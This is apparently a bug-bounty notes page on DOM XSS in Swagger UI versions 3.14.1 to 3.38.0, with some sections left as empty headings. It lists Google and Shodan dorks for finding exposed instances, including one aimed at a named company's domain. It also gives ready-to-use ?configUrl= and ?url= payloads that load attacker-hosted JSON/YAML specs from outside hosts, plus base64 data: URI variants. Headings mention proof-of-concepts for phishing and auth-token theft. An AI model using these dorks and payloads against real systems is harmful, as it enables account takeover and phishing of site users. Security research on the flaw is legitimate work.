💊Swagger-UI
Google Dork
site:broadcom.com intext:"Swagger UI" | intitle:"Swagger UI"
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?url=
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl= Shodan Dork:
http.title:"Swagger UI" hostname:"*.target.com"?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.jsonWhat is Swagger Ui?
---------------------------------------------------------------
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==---------------------------------------------------------------
POC with simple alert box:
POC rendering phishing page:
POC of stealing auth token:
Impact
Impact
---------------------------------------------------------------
How did I find DOM XSS ON Swagger-UI
Are Vulnerable versions To DOM XSS 3.14.1 < 3.38.0
---------------------------------------------------------------
Vuln web
Last updated